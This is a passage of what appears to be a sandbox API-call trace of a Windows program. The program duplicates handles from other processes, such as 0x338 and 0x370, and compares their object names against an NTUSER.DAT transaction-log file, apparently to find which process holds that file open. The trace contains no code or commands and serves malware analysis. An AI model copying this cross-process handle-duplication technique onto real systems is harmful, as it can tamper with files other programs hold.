0x1e4 [0162.711] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.712] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.712] CloseHandle (hObject=0x1e4) returned 1 [0162.712] _wcsicmp (_Str1="\\tracking.log", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0162.712] CloseHandle (hObject=0x194) returned 1 [0162.712] CloseHandle (hObject=0x1e8) returned 1 [0162.712] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.712] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x46c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.712] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.713] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.718] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.718] CloseHandle (hObject=0x1e4) returned 1 [0162.718] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0162.718] CloseHandle (hObject=0x194) returned 1 [0162.718] CloseHandle (hObject=0x1e8) returned 1 [0162.718] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.718] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x470, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.718] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.720] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.721] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.722] CloseHandle (hObject=0x1e4) returned 1 [0162.722] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0162.722] CloseHandle (hObject=0x194) returned 1 [0162.722] CloseHandle (hObject=0x1e8) returned 1 [0162.722] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.722] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x474, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.722] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.730] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.731] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.731] CloseHandle (hObject=0x1e4) returned 1 [0162.731] _wcsicmp (_Str1="\\trkwks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0162.731] CloseHandle (hObject=0x194) returned 1 [0162.731] CloseHandle (hObject=0x1e8) returned 1 [0162.731] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.731] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x580, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.731] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.732] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.733] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.733] CloseHandle (hObject=0x1e4) returned 1 [0162.733] CloseHandle (hObject=0x194) returned 1 [0162.733] CloseHandle (hObject=0x1e8) returned 1 [0162.733] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.733] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x584, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.733] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.734] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.735] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.735] CloseHandle (hObject=0x1e4) returned 1 [0162.735] CloseHandle (hObject=0x194) returned 1 [0162.735] CloseHandle (hObject=0x1e8) returned 1 [0162.735] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.735] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x660, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.735] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.736] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.737] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.737] CloseHandle (hObject=0x1e4) returned 1 [0162.737] CloseHandle (hObject=0x194) returned 1 [0162.737] CloseHandle (hObject=0x1e8) returned 1 [0162.737] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.737] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x6a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.737] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.738] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.739] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.739] CloseHandle (hObject=0x1e4) returned 1 [0162.739] _wcsicmp (_Str1="\\sysmain.dll.mui", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.739] CloseHandle (hObject=0x194) returned 1 [0162.739] CloseHandle (hObject=0x1e8) returned 1 [0162.740] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x338) returned 0x1e8 [0162.740] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x700, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.740] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.740] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.741] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.741] CloseHandle (hObject=0x1e4) returned 1 [0162.741] CloseHandle (hObject=0x194) returned 1 [0162.741] CloseHandle (hObject=0x1e8) returned 1 [0162.741] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.741] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0xc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.741] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.743] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.743] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.743] CloseHandle (hObject=0x1e4) returned 1 [0162.744] _wcsicmp (_Str1="\\System32", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.744] CloseHandle (hObject=0x194) returned 1 [0162.744] CloseHandle (hObject=0x1e8) returned 1 [0162.744] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.744] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.744] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.745] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.745] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.746] CloseHandle (hObject=0x1e4) returned 1 [0162.746] CloseHandle (hObject=0x194) returned 1 [0162.746] CloseHandle (hObject=0x1e8) returned 1 [0162.746] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.746] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3b0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.746] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.747] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.748] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.748] CloseHandle (hObject=0x1e4) returned 1 [0162.748] CloseHandle (hObject=0x194) returned 1 [0162.748] CloseHandle (hObject=0x1e8) returned 1 [0162.748] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.748] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x3bc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.748] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.749] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.749] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.750] CloseHandle (hObject=0x1e4) returned 1 [0162.750] CloseHandle (hObject=0x194) returned 1 [0162.750] CloseHandle (hObject=0x1e8) returned 1 [0162.750] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.750] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x480, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.750] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.751] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.751] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.751] CloseHandle (hObject=0x1e4) returned 1 [0162.751] _wcsicmp (_Str1="\\SCHEDLGU.TXT", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 5 [0162.751] CloseHandle (hObject=0x194) returned 1 [0162.752] CloseHandle (hObject=0x1e8) returned 1 [0162.752] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.752] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x498, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.752] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.752] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.753] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.753] CloseHandle (hObject=0x1e4) returned 1 [0162.753] CloseHandle (hObject=0x194) returned 1 [0162.753] CloseHandle (hObject=0x1e8) returned 1 [0162.753] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.753] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x49c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.754] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.754] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.755] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.755] CloseHandle (hObject=0x1e4) returned 1 [0162.755] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.755] CloseHandle (hObject=0x194) returned 1 [0162.755] CloseHandle (hObject=0x1e8) returned 1 [0162.755] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.756] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.756] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.756] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.757] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.757] CloseHandle (hObject=0x1e4) returned 1 [0162.757] _wcsicmp (_Str1="\\Tasks", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned 6 [0162.757] CloseHandle (hObject=0x194) returned 1 [0162.758] CloseHandle (hObject=0x1e8) returned 1 [0162.758] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.758] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a4, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.758] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.758] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.759] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.759] CloseHandle (hObject=0x1e4) returned 1 [0162.759] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.759] CloseHandle (hObject=0x194) returned 1 [0162.760] CloseHandle (hObject=0x1e8) returned 1 [0162.760] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.760] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4a8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.760] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.760] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.761] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.761] CloseHandle (hObject=0x1e4) returned 1 [0162.761] _wcsicmp (_Str1="\\atsvc", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.761] CloseHandle (hObject=0x194) returned 1 [0162.761] CloseHandle (hObject=0x1e8) returned 1 [0162.761] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.761] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.761] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.762] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.763] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.763] CloseHandle (hObject=0x1e4) returned 1 [0162.763] CloseHandle (hObject=0x194) returned 1 [0162.763] CloseHandle (hObject=0x1e8) returned 1 [0162.763] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.763] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4c8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.763] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.764] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.770] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.770] CloseHandle (hObject=0x1e4) returned 1 [0162.770] CloseHandle (hObject=0x194) returned 1 [0162.770] CloseHandle (hObject=0x1e8) returned 1 [0162.770] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.770] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4d0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.770] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.773] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.775] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.775] CloseHandle (hObject=0x1e4) returned 1 [0162.775] _wcsicmp (_Str1="\\CatalogChangeListener-370-0", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -11 [0162.775] CloseHandle (hObject=0x194) returned 1 [0162.775] CloseHandle (hObject=0x1e8) returned 1 [0162.775] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.775] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4d8, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.775] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.777] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.778] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.778] CloseHandle (hObject=0x1e4) returned 1 [0162.778] CloseHandle (hObject=0x194) returned 1 [0162.778] CloseHandle (hObject=0x1e8) returned 1 [0162.778] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.778] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x4dc, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.778] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.779] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.779] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.780] CloseHandle (hObject=0x1e4) returned 1 [0162.780] CloseHandle (hObject=0x194) returned 1 [0162.780] CloseHandle (hObject=0x1e8) returned 1 [0162.780] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.780] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x520, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.780] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.781] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.781] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.782] CloseHandle (hObject=0x1e4) returned 1 [0162.782] _wcsicmp (_Str1="\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -13 [0162.782] CloseHandle (hObject=0x194) returned 1 [0162.782] CloseHandle (hObject=0x1e8) returned 1 [0162.782] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.782] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x5f0, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.782] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.783] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.784] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.784] CloseHandle (hObject=0x1e4) returned 1 [0162.784] _wcsicmp (_Str1="\\MOF", _Str2="\\NTUSER.DAT{016888bd-6c6f-11de-8d1d-001e0bcde3ec}.TM.blf") returned -1 [0162.784] CloseHandle (hObject=0x194) returned 1 [0162.784] CloseHandle (hObject=0x1e8) returned 1 [0162.784] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.784] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x68c, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.784] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.785] WaitForSingleObject (hHandle=0x1e4, dwMilliseconds=0xfa) returned 0x0 [0162.786] GetExitCodeThread (in: hThread=0x1e4, lpExitCode=0x32ee30 | out: lpExitCode=0x32ee30) returned 1 [0162.786] CloseHandle (hObject=0x1e4) returned 1 [0162.786] CloseHandle (hObject=0x194) returned 1 [0162.786] CloseHandle (hObject=0x1e8) returned 1 [0162.786] OpenProcess (dwDesiredAccess=0x100441, bInheritHandle=0, dwProcessId=0x370) returned 0x1e8 [0162.786] DuplicateHandle (in: hSourceProcessHandle=0x1e8, hSourceHandle=0x788, hTargetProcessHandle=0xffffffff, lpTargetHandle=0x32ee78, dwDesiredAccess=0x0, bInheritHandle=0, dwOptions=0x2 | out: lpTargetHandle=0x32ee78*=0x194) returned 1 [0162.786] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xca5650, lpParameter=0x32ee28, dwCreationFlags=0x0, lpThreadId=0x0 | out: lpThreadId=0x0) returned 0x1e4 [0162.787] WaitForSingleObject 